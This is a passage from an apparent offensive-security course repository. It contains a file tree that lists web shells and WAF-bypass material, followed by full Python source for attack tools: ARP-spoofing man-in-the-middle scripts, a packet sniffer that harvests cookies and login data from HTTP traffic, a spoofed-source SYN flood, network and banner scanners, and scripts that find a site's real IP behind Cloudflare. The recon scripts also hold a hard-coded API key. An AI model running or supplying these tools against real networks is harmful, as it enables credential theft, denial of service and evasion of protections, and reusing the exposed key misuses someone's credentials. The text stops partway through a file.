├── .github └── workflows │ └── python-publish.yml ├── MPC_python_tools ├── bannar_grub.sh ├── loacal_network_attack │ ├── Spoofer2.py │ ├── arp_spoof.py │ ├── burp_suite.py │ ├── network_scan.py │ └── synflood.py ├── recon_tools │ ├── Real_IP_Finder │ │ ├── README.md │ │ ├── colorama │ │ ├── ipFinder.py │ │ ├── json │ │ ├── pyfiglet │ │ ├── requests │ │ └── requirements.txt │ ├── subFinder.py │ └── wafbypass_ip_finder.py └── writeup_finder.py ├── README.md ├── course_outline ├── MPC-Class_mindmap.minder ├── mpc_class_outline.md └── photo │ └── outline.png ├── gitPush.sh ├── lesson_notes ├── Anit_forensics(Mini_Course) │ ├── AnitForensive_Day2.md │ ├── AntiForensive_Methodology.md │ └── note.md ├── Paper │ ├── Anti_Forencis │ │ ├── Anti-Forensic Techniques_1.pdf │ │ ├── Anti-Forensics-LayerOne-Paul_Henry.pdf │ │ └── anti-forensics-aide.pdf │ ├── DBMS_7thEdition.pdf │ ├── SQL_Injection │ │ ├── A Study of Out-of-Band SQL Injection.pdf │ │ ├── A_novel_method_for_SQL_injection_attack_detection_.pdf │ │ ├── Boolean_based_SQLi_1.pdf │ │ ├── Boolean_based_SQLi_2.pdf │ │ ├── ErrorBaseDoubleQueryInjection.pdf │ │ ├── ErrorBaseDoubleQueryInjection_2.pdf │ │ ├── ErrorBaseDoubleQueryInjection_3.pdf │ │ ├── The Ultimate Guide to SQL Injection _ PurpleBox.pdf │ │ └── sql2.png │ ├── fileUploadVulnerabity.pdf │ └── firewallBypass │ │ ├── CODE_OF_CONDUCT.md │ │ ├── CONTRIBUTING.md │ │ ├── LICENSE │ │ ├── README.md │ │ ├── images │ │ ├── character-interpretations.png │ │ ├── how-wafs-work.png │ │ └── waf-general-arch.png │ │ ├── others │ │ ├── README.md │ │ └── obfu.py │ │ ├── papers │ │ ├── Artificial Neural Network based WAF for SQL Injection.pdf │ │ ├── Beyond SQLi - Obfuscate and Bypass WAFs.txt │ │ ├── Bypassing WAF XSS Detection Mechanisms.pdf │ │ ├── Bypassing Web Application Firewalls with HTTP Parameter Pollution.pdf │ │ ├── Evading All Web-Application Firewalls XSS Filters.pdf │ │ ├── Modern WAF Fingerprinting and XSS Filter Bypass.pdf │ │ ├── Poking A Hole In The Firewall.pdf │ │ ├── Qualys Guide - Protocol-Level WAF Evasion.pdf │ │ ├── SANS Guide - WAF Evasion Testing.pdf │ │ ├── Side Channel (Timing) Attacks for Fingerprinting WAF Rules.pdf │ │ ├── WASC WAF Evaluation Criteria.pdf │ │ └── Web Application Firewalls - Evaluation and Analysis.pdf │ │ └── presentations │ │ ├── A Forgotten HTTP Invisibility Cloak.pdf │ │ ├── BlackHat US 12 - Protocol Level WAF Evasion (Slides).pdf │ │ ├── BlackHat US 16 - Analysis of Attack Detection Logic.pdf │ │ ├── Building Your Own WAF as a Service and Forgetting about False Positives.pdf │ │ ├── Methods To Bypass A Web Application Firewall.pdf │ │ ├── OWASP WAF Profiling & Evasion.pdf │ │ ├── Our Favourite XSS WAF Filters And How To Bypass Them.pdf │ │ ├── Playing Around with WAFs.pdf │ │ ├── Side Channel Attacks for Fingerprinting WAF Filter Rules.pdf │ │ ├── WAF Bypasses and PHP Exploits (Slides).pdf │ │ └── WEb Application Firewall Bypassing (How to Defeat the Blue Team).pdf ├── docker_course │ ├── 01.dockerBasic.md │ ├── 02.ZD Research Lab Installation in Docker.md │ ├── lab.sh │ └── portainer.sh ├── photo │ ├── HTTP.png │ ├── URL_structure.png │ ├── anti_csrf.png │ ├── client&server.png │ ├── com_inject.png │ ├── csrf.png │ ├── csrf_lab.png │ ├── docker.png │ ├── docker2.png │ ├── http_structure.png │ ├── inband.png │ ├── oob.png │ ├── openBounty_1.png │ ├── openBounty_2.png │ ├── openBounty_3.png │ ├── openRe.png │ ├── phishing.png │ ├── report.png │ ├── request_header.png │ ├── sav.png │ ├── sqli.png │ ├── sqli2.png │ ├── sqli3.png │ ├── sqli4.png │ ├── ssrf1.png │ ├── ssrf2.png │ ├── ssrf3.png │ ├── ssrf4.png │ ├── ssrf5.png │ ├── url.png │ ├── waf.png │ ├── waf_function.png │ └── webArchi.png ├── w-10.0_Logic_flaws │ ├── logic_flaw_theory.md │ └── methodology.md ├── w-2.1_webArchi_Ref │ ├── UNIT 6(WWW&HTTP&WAP).pptx │ └── Web_Architecture.md ├── w-2.2_Web_Technologies │ └── w-2.1_web_tech.md ├── w-2.6_Basic_Terminologies │ └── w-2.6.a_Hacking_terminology.md ├── w-3.0_BurpSuit_Ref │ ├── Burpsuit_Lacture.drawio.png │ ├── burpCrack_install.md │ ├── w-3.1.a_BurpSuite_Theory.html │ ├── w-3.1.b_lacture_recap.md │ ├── w-3.1.c_test_wordlist.txt │ └── w-3.1.d_BurpDecodeErrorSolve.md ├── w-4.0_open_redirection │ ├── payload.txt │ └── w-4.1.a_Basic Theory about Openredirection.md ├── w-5.0_Command_Injection │ ├── w-5.1.a_CommadI_Theory.md │ ├── w-5.1.b_delimiters.md │ ├── w-5.2.c_phpCodes │ │ ├── commandInject_1.php │ │ └── commandInject_2.php │ └── w-5.5.a_out-of-band_theory.md ├── w-6.0_sql_injection │ ├── 6-1_basic_SQLi.md │ ├── 6-2_finding_SQLI.md │ ├── 6-3_errorBased_SQLi.md │ ├── 6-4_Blind_SQL_Injection.md │ ├── mysql_errorBased.php │ └── mysqli.php ├── w-7.0_waf_bypass │ ├── 7.1_Basic_waf_function.md │ ├── 7.2_waf_bypass.md │ ├── 7.3_advnace_waf_bypass.md │ └── 7.4_firewallBypass_cheatSheet │ │ ├── CODE_OF_CONDUCT.md │ │ ├── CONTRIBUTING.md │ │ ├── LICENSE │ │ ├── README.md │ │ ├── images │ │ ├── character-interpretations.png │ │ ├── how-wafs-work.png │ │ └── waf-general-arch.png │ │ ├── others │ │ ├── README.md │ │ └── obfu.py │ │ ├── papers │ │ ├── Artificial Neural Network based WAF for SQL Injection.pdf │ │ ├── Beyond SQLi - Obfuscate and Bypass WAFs.txt │ │ ├── Bypassing WAF XSS Detection Mechanisms.pdf │ │ ├── Bypassing Web Application Firewalls with HTTP Parameter Pollution.pdf │ │ ├── Evading All Web-Application Firewalls XSS Filters.pdf │ │ ├── Modern WAF Fingerprinting and XSS Filter Bypass.pdf │ │ ├── Poking A Hole In The Firewall.pdf │ │ ├── Qualys Guide - Protocol-Level WAF Evasion.pdf │ │ ├── SANS Guide - WAF Evasion Testing.pdf │ │ ├── Side Channel (Timing) Attacks for Fingerprinting WAF Rules.pdf │ │ ├── WASC WAF Evaluation Criteria.pdf │ │ └── Web Application Firewalls - Evaluation and Analysis.pdf │ │ └── presentations │ │ ├── A Forgotten HTTP Invisibility Cloak.pdf │ │ ├── BlackHat US 12 - Protocol Level WAF Evasion (Slides).pdf │ │ ├── BlackHat US 16 - Analysis of Attack Detection Logic.pdf │ │ ├── Building Your Own WAF as a Service and Forgetting about False Positives.pdf │ │ ├── Methods To Bypass A Web Application Firewall.pdf │ │ ├── OWASP WAF Profiling & Evasion.pdf │ │ ├── Our Favourite XSS WAF Filters And How To Bypass Them.pdf │ │ ├── Playing Around with WAFs.pdf │ │ ├── Side Channel Attacks for Fingerprinting WAF Filter Rules.pdf │ │ ├── WAF Bypasses and PHP Exploits (Slides).pdf │ │ └── WEb Application Firewall Bypassing (How to Defeat the Blue Team).pdf ├── w-8.0_csrf │ ├── csrf.md │ ├── csrf_exploit.html │ ├── csrf_form.html │ ├── csrf_lab_no_defense.md │ └── csrf_lab_no_defense_files │ │ ├── academy.png │ │ ├── analytics.js │ │ ├── anchor.html │ │ ├── api.js │ │ ├── burp-suite-icon.svg │ │ ├── burp-suite.jpg │ │ ├── community.svg │ │ ├── cross-site request forgery.svg │ │ ├── dastardly.svg │ │ ├── enterprise.svg │ │ ├── gtm.js │ │ ├── latest-burp-suite-software-download.jpg │ │ ├── portswigger-logo.svg │ │ ├── professional.svg │ │ ├── psacademy.css │ │ ├── recaptcha__en.js │ │ ├── register.js │ │ ├── saved_resource(1).html │ │ ├── saved_resource.html │ │ ├── staticcms.js │ │ ├── styles__ltr.css │ │ └── tailored-quote.png └── w-9.0_ssrf │ ├── ssrf_lab1.py │ └── ssrf_theory.md ├── pentester_roadmap └── README.md └── shells ├── AlphaShell ├── alfa.php ├── phpinfo2.php ├── shell .jpg ├── shell.php └── shellpass.md ├── Priv8_Shell.php ├── bypass.php └── mini_shell.php /.github/workflows/python-publish.yml: -------------------------------------------------------------------------------- 1 | # This workflow will upload a Python Package using Twine when a release is created 2 | # For more information see: https://docs.github.com/en/actions/automating-builds-and-tests/building-and-testing-python#publishing-to-package-registries 3 | 4 | # This workflow uses actions that are not certified by GitHub. 5 | # They are provided by a third-party and are governed by 6 | # separate terms of service, privacy policy, and support 7 | # documentation. 8 | 9 | name: Upload Python Package 10 | 11 | on: 12 | release: 13 | types: [published] 14 | 15 | permissions: 16 | contents: read 17 | 18 | jobs: 19 | deploy: 20 | 21 | runs-on: ubuntu-latest 22 | 23 | steps: 24 | - uses: actions/checkout@v3 25 | - name: Set up Python 26 | uses: actions/setup-python@v3 27 | with: 28 | python-version: '3.x' 29 | - name: Install dependencies 30 | run: | 31 | python -m pip install --upgrade pip 32 | pip install build 33 | - name: Build package 34 | run: python -m build 35 | - name: Publish package 36 | uses: pypa/gh-action-pypi-publish@27b31702a0e7fc50959f5ad993c78deac1bdfc29 37 | with: 38 | user: __token__ 39 | password: ${{ secrets.PYPI_API_TOKEN }} 40 | -------------------------------------------------------------------------------- /MPC_python_tools/bannar_grub.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | DEFAULT_PORT=80 4 | 5 | print_usage() { 6 | echo -e "Usage: $0 \e[1;33m\e[0m [\e[1;33mport\e[0m]" 7 | exit 1 8 | } 9 | 10 | grab_banner() { 11 | local ip_address=$1 12 | local port=${2:-$DEFAULT_PORT} 13 | 14 | echo -e "==============================================" 15 | echo -e "\e[1;34mBanner Grabbing Results\e[0m" 16 | echo -e "----------------------------------------------" 17 | echo -e "\e[1;33mTarget IP:\e[0m\t\t\t${ip_address}" 18 | echo -e "\e[1;33mTarget Port:\e[0m\t\t\t${port}" 19 | echo -e "\e[1;33mServer Header:\e[0m\t\t\t${result}" 20 | echo -e "==============================================" 21 | } 22 | 23 | if [[ $# -eq 0 ]]; then 24 | print_usage 25 | fi 26 | 27 | ip_address=$1 28 | port=$2 29 | 30 | if [[ -z "${ip_address}" ]]; then 31 | echo -e "\e[1;31mYou must provide an IP address.\e[0m" 32 | print_usage 33 | fi 34 | 35 | echo -e "\e[1;34mAttempting to grab the Server header of ${ip_address}\e[0m" 36 | result=$(curl -sI "${ip_address}:${port}" | awk -F': ' '/Server/ {print $2}') 37 | grab_banner "$ip_address" "$port" 38 | -------------------------------------------------------------------------------- /MPC_python_tools/loacal_network_attack/Spoofer2.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | # -*- coding: utf-8 -*- 3 | """ 4 | Created on Sat Nov 19 00:27:30 2022 5 | 6 | @author: dr404 (Myanmar Pentester Community) 7 | """ 8 | 9 | 10 | target_ip = input("target IP : ") 11 | gateway_ip = input("GateWay IP : ") 12 | 13 | import scapy.all as scapy 14 | from termcolor import colored 15 | import time 16 | import sys 17 | 18 | def yellow(string,color='yellow'): 19 | return colored(string,color) 20 | 21 | 22 | def red(string,color='red'): 23 | return colored(string,color) 24 | 25 | def get_mac(ip): 26 | 27 | # Creating ARP request to broadcast 28 | arp_request = scapy.ARP(pdst=ip) 29 | broadcast = scapy.Ether(dst="ff:ff:ff:ff:ff:ff") 30 | 31 | # Creating Final Packet to Broad Cast 32 | arp_request_broadcast = broadcast/arp_request 33 | 34 | # Sending Request(broadcast) and caputer request 35 | # The request contain two list (asnwer, and unansewer) 36 | 37 | answered_list = scapy.srp(arp_request_broadcast, timeout=1, verbose=False)[0] 38 | 39 | return answered_list[0][1].hwsrc 40 | 41 | 42 | 43 | 44 | def spoof(target_ip, spoof_ip): 45 | 46 | target_mac = get_mac(target_ip) 47 | 48 | #op=1 mean arp request (who-has) and op=2 is respond (is-at) 49 | 50 | packet = scapy.ARP(op=2, pdst=target_ip, hwdst=target_mac, psrc=spoof_ip) 51 | 52 | scapy.send(packet,verbose=False) 53 | 54 | 55 | 56 | def restore(destination_ip, source_ip): # To restore and function normal in victim computer 57 | 58 | destination_mac = get_mac(destination_ip) 59 | 60 | # ARP default set our own mac address as hwsrc, so we need to set hwsrc= manaually with router ip 61 | source_mac = get_mac(source_ip) 62 | packet = scapy.ARP(op=2, pdst=destination_ip, hwdst=destination_mac, psrc=source_ip, hwsrc=source_mac ) 63 | scapy.send(packet, count=4, verbose=False) 64 | 65 | 66 | def main(): 67 | 68 | # Without while loop, only one packet is send . so we need to use while loop to stay as man in the middle. 69 | 70 | 71 | sent_packet_count = 0 72 | 73 | try: 74 | while True: 75 | spoof(target_ip,gateway_ip) 76 | spoof(gateway_ip,target_ip) 77 | 78 | sent_packet_count = sent_packet_count + 2 79 | 80 | # "\r" always this string always start of the line. so only sent_packet_count change 81 | print("\r[+] Packet sent : "+ yellow(str(sent_packet_count)),end=" ") 82 | 83 | #Without sys.stdout, we cannot see any output in terminal 84 | sys.stdout.flush() 85 | 86 | time.sleep(2) 87 | 88 | except KeyboardInterrupt: 89 | print(red("\n\n[+] Detected CTRL + C ......Resetting ARP table.....Please Wait. \n")) 90 | restore(target_ip,gateway_ip) 91 | restore(gateway_ip,target_ip) 92 | 93 | 94 | 95 | 96 | if __name__=='__main__': 97 | main() 98 | 99 | 100 | 101 | 102 | 103 | 104 | 105 | 106 | 107 | 108 | 109 | 110 | 111 | 112 | 113 | 114 | 115 | 116 | 117 | 118 | 119 | 120 | 121 | 122 | 123 | -------------------------------------------------------------------------------- /MPC_python_tools/loacal_network_attack/arp_spoof.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | # -*- coding: utf-8 -*- 3 | """ 4 | Created on Sat Nov 19 00:27:30 2022 5 | 6 | @author: dr404 (Myanmar Pentester Community) 7 | """ 8 | 9 | 10 | target_ip = input("target IP : ") 11 | gateway_ip = input("GateWay IP : ") 12 | 13 | import scapy.all as scapy 14 | from termcolor import colored 15 | import time 16 | import sys 17 | 18 | def yellow(string,color='yellow'): 19 | return colored(string,color) 20 | 21 | 22 | def red(string,color='red'): 23 | return colored(string,color) 24 | 25 | def get_mac(ip): 26 | 27 | # Creating ARP request to broadcast 28 | arp_request = scapy.ARP(pdst=ip) 29 | broadcast = scapy.Ether(dst="ff:ff:ff:ff:ff:ff") 30 | 31 | # Creating Final Packet to Broad Cast 32 | arp_request_broadcast = broadcast/arp_request 33 | 34 | # Sending Request(broadcast) and caputer request 35 | # The request contain two list (asnwer, and unansewer) 36 | 37 | answered_list = scapy.srp(arp_request_broadcast, timeout=1, verbose=False)[0] 38 | 39 | return answered_list[0][1].hwsrc 40 | 41 | 42 | 43 | 44 | def spoof(target_ip, spoof_ip): 45 | 46 | target_mac = get_mac(target_ip) 47 | 48 | #op=1 mean arp request (who-has) and op=2 is respond (is-at) 49 | 50 | packet = scapy.ARP(op=2, pdst=target_ip, hwdst=target_mac, psrc=spoof_ip) 51 | 52 | scapy.send(packet,verbose=False) 53 | 54 | 55 | 56 | def restore(destination_ip, source_ip): # To restore and function normal in victim computer 57 | 58 | destination_mac = get_mac(destination_ip) 59 | 60 | # ARP default set our own mac address as hwsrc, so we need to set hwsrc= manaually with router ip 61 | source_mac = get_mac(source_ip) 62 | packet = scapy.ARP(op=2, pdst=destination_ip, hwdst=destination_mac, psrc=source_ip, hwsrc=source_mac ) 63 | scapy.send(packet, count=4, verbose=False) 64 | 65 | 66 | def main(): 67 | 68 | # Without while loop, only one packet is send . so we need to use while loop to stay as man in the middle. 69 | 70 | 71 | sent_packet_count = 0 72 | 73 | try: 74 | while True: 75 | spoof(target_ip,gateway_ip) 76 | spoof(gateway_ip,target_ip) 77 | 78 | sent_packet_count = sent_packet_count + 2 79 | 80 | # "\r" always this string always start of the line. so only sent_packet_count change 81 | print("\r[+] Packet sent : "+ yellow(str(sent_packet_count)),end=" ") 82 | 83 | #Without sys.stdout, we cannot see any output in terminal 84 | sys.stdout.flush() 85 | 86 | time.sleep(2) 87 | 88 | except KeyboardInterrupt: 89 | print(red("\n\n[+] Detected CTRL + C ......Resetting ARP table.....Please Wait. \n")) 90 | restore(target_ip,gateway_ip) 91 | restore(gateway_ip,target_ip) 92 | 93 | 94 | 95 | 96 | if __name__=='__main__': 97 | main() 98 | 99 | 100 | 101 | 102 | 103 | 104 | 105 | 106 | 107 | 108 | 109 | 110 | 111 | 112 | 113 | 114 | 115 | 116 | 117 | 118 | 119 | 120 | 121 | 122 | 123 | -------------------------------------------------------------------------------- /MPC_python_tools/loacal_network_attack/burp_suite.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | # -*- coding: utf-8 -*- 3 | """ 4 | Created on Sat Nov 19 05:58:40 2022 5 | 6 | @author: dr404 (Myanmar Pentester Community) 7 | """ 8 | 9 | 10 | import scapy.all as scapy 11 | 12 | 13 | # Need to install scapy_http module (pip3 install scapy_http) 14 | from scapy.layers import http 15 | from termcolor import colored 16 | 17 | 18 | def banner(name): 19 | return print(name+"\n\n") 20 | 21 | 22 | 23 | 24 | 25 | name = """ 26 | ================================================================ 27 | # ____ __ __ # 28 | # / _/___ / /_ ___ ____ ____ ___ ___ / /_ ___ ____ # 29 | # _/ / / _ \/ __// -_) / __// __// -_)/ _ \/ __// _ \ / __/ # 30 | # /___//_//_/\__/ \__/ /_/ \__/ \__// .__/\__/ \___//_/ # 31 | # /_/ # 32 | # by Dr.404 # 33 | # https://github.com/dr-404 # 34 | # Myanmar Pentester Community # 35 | # # 36 | ================================================================ 37 | """ 38 | 39 | 40 | 41 | def yellow(string): 42 | return colored(string,'yellow') 43 | 44 | 45 | 46 | def sniff(interface): 47 | scapy.sniff(iface=interface, store=False, prn=process_sniffed_packet) 48 | 49 | def process_sniffed_packet(packet): 50 | 51 | 52 | if packet.haslayer(http.HTTPRequest): 53 | 54 | 55 | if packet.haslayer(scapy.Raw): 56 | 57 | #print(packet.show()) 58 | 59 | method = packet.Method.decode('UTF-8') 60 | 61 | version = packet.Http_Version.decode('UTF-8') 62 | 63 | uAgent = packet.User_Agent.decode('UTF-8') 64 | 65 | content = packet.Content_Type.decode('UTF-8') 66 | 67 | url = (packet.Host + packet.Path).decode('UTF-8') 68 | 69 | referer = packet.Referer.decode('UTF-8') 70 | 71 | cookie = str(packet.Cookie) 72 | 73 | login = packet[scapy.Raw].load.decode("UTF-8") 74 | 75 | print("Request MEthod\t:\t" + yellow(method)) 76 | print("HTTP Version\t:\t" + yellow(version)) 77 | print("User-Agent\t:\t" + yellow(uAgent)) 78 | print("Content-Type\t:\t" + yellow(content)) 79 | print("Requested URL\t:\t" + yellow(url)) 80 | print("Referer\t\t:\t" + yellow(referer)) 81 | print("Cookie\t\t:\t" + yellow(cookie)) 82 | 83 | print("Login Info\t:\t"+yellow(login)) 84 | 85 | banner(name) 86 | sniff('wlan0') 87 | 88 | 89 | 90 | 91 | -------------------------------------------------------------------------------- /MPC_python_tools/loacal_network_attack/network_scan.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | # -*- coding: utf-8 -*- 3 | """ 4 | Created on Wed Nov 16 22:58:16 2022 5 | 6 | @author: dr404 7 | 8 | 9 | """ 10 | 11 | 12 | from termcolor import colored 13 | import scapy.all as scapy 14 | import argparse 15 | 16 | def print_banner(title=""): 17 | 18 | 19 | print (colored(''' 20 | ================================================================ 21 | # # 22 | # _ __ __ _____ # 23 | # / | / ___ / /_ / ___/_________ _____ ____ ___ _____ # 24 | # / |/ / _ \/ __/ \__ \/ ___/ __ `/ __ \/ __ \/ _ \/ ___/ # 25 | # / /| / __/ /_ ___/ / /__/ /_/ / / / / / / / __/ / # 26 | # /_/ |_/\___/\__/ /____/\___/\__,_/_/ /_/_/ /_/\___/_/ # 27 | # by Dr.404 # 28 | # # 29 | # https://github.com/Dr-404 # 30 | # Myanmar Pentester Community # 31 | # # 32 | ================================================================ 33 | ''', 'green',attrs=(['bold']))) 34 | 35 | 36 | 37 | 38 | 39 | def scan(ip): 40 | 41 | # Creating ARP request to broadcast 42 | arp_request = scapy.ARP(pdst=ip) 43 | broadcast = scapy.Ether(dst="ff:ff:ff:ff:ff:ff") 44 | 45 | # Creating Final Packet to Broad Cast 46 | arp_request_broadcast = broadcast/arp_request 47 | 48 | # Sending Request(broadcast) and caputer request 49 | # The request contain two list (asnwer, and unansewer) 50 | 51 | answered_list = scapy.srp(arp_request_broadcast, timeout=1, verbose=False)[0] 52 | 53 | 54 | 55 | # Create Empty list to store data after looping answered list 56 | client_list = [] 57 | 58 | # Use For Loop to extract data from answer list 59 | 60 | for element in answered_list: 61 | 62 | 63 | source_ip = element[1].psrc 64 | source_mac = element[1].hwsrc 65 | 66 | # creating dictionary (only ip and mac address) using each data from answered list 67 | client_dict = {"ip":source_ip , "mac":source_mac} 68 | 69 | # adding data to client_list from client_dict (dictionary data) 70 | client_list.append(client_dict) 71 | 72 | return client_list 73 | 74 | 75 | 76 | def print_result(result_list): 77 | print("IP\t\t\tMac Address\n---------------------------------------") 78 | 79 | for client in result_list: 80 | print(client['ip']+"\t\t"+client['mac']) 81 | 82 | 83 | def get_argument(): 84 | parser = argparse.ArgumentParser() 85 | parser.add_argument("-t", "--target", dest="target", help=("Target IP/Ip Range.") ) 86 | option = parser.parse_args() 87 | return option 88 | 89 | 90 | def main(): 91 | 92 | print_banner() 93 | 94 | 95 | options = get_argument() 96 | 97 | scan_result= scan(options.target) 98 | print_result(scan_result) 99 | 100 | 101 | 102 | 103 | if __name__=='__main__': 104 | main() 105 | 106 | 107 | 108 | 109 | 110 | 111 | 112 | 113 | 114 | 115 | 116 | 117 | 118 | 119 | 120 | 121 | -------------------------------------------------------------------------------- /MPC_python_tools/loacal_network_attack/synflood.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | 3 | from scapy.all import * 4 | import sys 5 | import time 6 | 7 | 8 | 9 | 10 | 11 | def synFlood(src,tgt,message): 12 | packet_count = 0 13 | 14 | for dport in range(1024,65535): 15 | #dport = 80 16 | IPlayer = IP(src=src, dst=tgt) 17 | TCPlayer = TCP(sport=4444, dport=dport) 18 | RAWlayer = Raw(load=message) 19 | 20 | pkt = IPlayer/TCPlayer/RAWlayer 21 | send(pkt, verbose=False) 22 | 23 | packet_count = packet_count + 1 24 | 25 | 26 | 27 | 28 | 29 | 30 | 31 | def main(): 32 | source = input("[+] Enter Source IP Address to Fake : ") 33 | target = input("[+] Enter Target IP : ") 34 | message = input("[+] Enter Message for TCP paylaod : ") 35 | 36 | 37 | 38 | while True: 39 | synFlood(source,target,message) 40 | #packet_count = packet_count + 1 41 | 42 | print("\r[+] Sending TCP packet : " +str(packet_count)) 43 | sys.stdout.flush() 44 | time.sleep(2) 45 | 46 | 47 | 48 | if __name__ == "__main__": 49 | main() 50 | 51 | 52 | 53 | 54 | 55 | 56 | 57 | -------------------------------------------------------------------------------- /MPC_python_tools/recon_tools/Real_IP_Finder/README.md: -------------------------------------------------------------------------------- 1 | # How to run this tools 2 | 3 | ``` 4 | 1. Register in https://securitytrails.com 5 | 2. Copy the API key edit key vairables in ipFinder.py 6 | 3. Install reqiure module using **"pip3 install -r requierments.txt"** 7 | 4. Type the domain without "http://" or "https://" and "www" eg "google.com" not "www.google.com" 8 | 5. Enjoy it 9 | ``` 10 | 11 | ### Please don't edit banner and give credit to Dr.404(Myanmar Pentester Community) 12 | 13 | ### Only for Education Purpose 14 | 15 | -------------------------------------------------------------------------------- /MPC_python_tools/recon_tools/Real_IP_Finder/colorama: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Dr-404/WebHacking/b831873e11ac09a3be64e3ef343a696414035e89/MPC_python_tools/recon_tools/Real_IP_Finder/colorama -------------------------------------------------------------------------------- /MPC_python_tools/recon_tools/Real_IP_Finder/ipFinder.py: -------------------------------------------------------------------------------- 1 | 2 | import requests 3 | import colorama 4 | from colorama import Fore, Style 5 | import json 6 | from termcolor import colored, cprint 7 | import pyfiglet 8 | 9 | #My Banner 10 | 11 | banner = pyfiglet.figlet_format("Real IP Finder", font = "slant") 12 | cprint(banner, 'green', attrs=['blink']) 13 | cprint(" by Dr.404\n",'green',attrs=['blink']) 14 | 15 | # print() 16 | # For colored Output 17 | 18 | colorama.init(Style.BRIGHT) 19 | blue = Fore.BLUE+Style.BRIGHT 20 | green = Fore.GREEN+Style.BRIGHT 21 | reset = Fore.RESET 22 | 23 | 24 | # Requesting Input 25 | cprint("Please edit the 'key' variable with your securityTrail API Key!!!! \n",'blue') 26 | domain = str(input("Enter your domain : ")) 27 | print() 28 | 29 | # PLease type your API key in Key parameter 30 | key = "6jWeKbd49Q1cEvwp0Ri5TyWsyD3ttkce" # Edit this with your API key 31 | 32 | 33 | # Requesting API json Data 34 | 35 | url = "https://api.securitytrails.com/v1/history/"+domain+"/dns/a" 36 | headers = { 37 | 38 | "Accept": "application/json", 39 | 40 | "APIKEY": key 41 | 42 | } 43 | response = requests.get(url, headers=headers) 44 | response_json = response.json() 45 | 46 | responseData = response_json["records"] 47 | 48 | for data in responseData: 49 | try: 50 | ip = data['values'][0]['ip'] 51 | org = data['organizations'][0] 52 | date = data['last_seen'] 53 | if org == "Cloudflare, Inc.": 54 | pass 55 | else: 56 | print("The Real IP of Domain may be : ",blue+ip+reset) 57 | print("The Organization of Domain Hosted is : ",blue+org+reset) 58 | print("This IP is Last seen on : ",blue+ date +reset) 59 | print() 60 | except: IndexError 61 | 62 | 63 | 64 | -------------------------------------------------------------------------------- /MPC_python_tools/recon_tools/Real_IP_Finder/json: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Dr-404/WebHacking/b831873e11ac09a3be64e3ef343a696414035e89/MPC_python_tools/recon_tools/Real_IP_Finder/json -------------------------------------------------------------------------------- /MPC_python_tools/recon_tools/Real_IP_Finder/pyfiglet: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Dr-404/WebHacking/b831873e11ac09a3be64e3ef343a696414035e89/MPC_python_tools/recon_tools/Real_IP_Finder/pyfiglet -------------------------------------------------------------------------------- /MPC_python_tools/recon_tools/Real_IP_Finder/requests: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Dr-404/WebHacking/b831873e11ac09a3be64e3ef343a696414035e89/MPC_python_tools/recon_tools/Real_IP_Finder/requests -------------------------------------------------------------------------------- /MPC_python_tools/recon_tools/Real_IP_Finder/requirements.txt: -------------------------------------------------------------------------------- 1 | 2 | requests 3 | colorama 4 | colorama 5 | termcolor 6 | colored 7 | cprint 8 | pyfiglet 9 | -------------------------------------------------------------------------------- /MPC_python_tools/recon_tools/subFinder.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | import re 3 | import requests 4 | 5 | 6 | 7 | print(" ") 8 | print(" ____ __ _____ __ ") 9 | print(" / ____ __/ / / __(____ ___/ ___ ____ ") 10 | print(" _\ \/ // / _ \/ _// / _ / _ / -_/ __/ ") 11 | print("/___/\_,_/_.__/_/ /_/_//_\_,_/\__/_/ ") 12 | print(" by ") 13 | print(" +-+-+-+-+-+-+ ") 14 | print(" |D|r|.|4|0|4| ") 15 | print(" +-+-+-+-+-+-+ ") 16 | print(" ") 17 | 18 | """ 19 | First I make request to crt.sh to view certificate log 20 | command ==> curl -X GET https://crt.sh/?q=nugmyanmar.org 21 | """ 22 | 23 | domain_name = input("Enter Domain Name : ") 24 | print("\n") 25 | prefix = "https://crt.sh/?q=" 26 | 27 | #matching subdomain using regex 28 | pattern = str ("\w+\."+domain_name) #\w mean alphanumical 29 | 30 | #Making request 31 | sub_Raw= requests.get(prefix + domain_name) 32 | result_Raw = str(sub_Raw.text) 33 | 34 | 35 | #patterm_www = "www." + domain_name 36 | result_filter = re.findall(pattern, result_Raw) 37 | result_list = [] 38 | 39 | for i in result_filter: 40 | 41 | result = i.replace("
", "") 42 | result = result.replace("","") 43 | #print (result) 44 | 45 | result_list.append(result) # Dont use a = a.appnd(b) just use a.append(b) 46 | 47 | result_rm_duplicate = list(set(result_list)) 48 | 49 | for resultFinal in result_rm_duplicate: 50 | if str(resultFinal) == str("www."+domain_name): 51 | pass 52 | else: 53 | print(resultFinal) 54 | 55 | 56 | 57 | 58 | 59 | -------------------------------------------------------------------------------- /MPC_python_tools/recon_tools/wafbypass_ip_finder.py: -------------------------------------------------------------------------------- 1 | 2 | import requests 3 | import colorama 4 | from colorama import Fore, Style 5 | import json 6 | from termcolor import colored, cprint 7 | import pyfiglet 8 | 9 | #My Banner 10 | 11 | banner = pyfiglet.figlet_format("Real IP Finder", font = "slant") 12 | cprint(banner, 'green', attrs=['blink']) 13 | cprint(" by Dr.404\n",'green',attrs=['blink']) 14 | 15 | # print() 16 | # For colored Output 17 | 18 | colorama.init(Style.BRIGHT) 19 | blue = Fore.BLUE+Style.BRIGHT 20 | green = Fore.GREEN+Style.BRIGHT 21 | reset = Fore.RESET 22 | 23 | 24 | # Requesting Input 25 | cprint("Please edit the 'key' variable with your securityTrail API Key!!!! \n",'blue') 26 | domain = str(input("Enter your domain : ")) 27 | print() 28 | 29 | # PLease type your API key in Key parameter 30 | key = "6jWeKbd49Q1cEvwp0Ri5TyWsyD3ttkce" # Edit this with your API key 31 | 32 | 33 | # Requesting API json Data 34 | 35 | url = "https://api.securitytrails.com/v1/history/"+domain+"/dns/a" 36 | headers = { 37 | 38 | "Accept": "application/json", 39 | 40 | "APIKEY": key 41 | 42 | } 43 | response = requests.get(url, headers=headers) 44 | response_json = response.json() 45 | 46 | responseData = 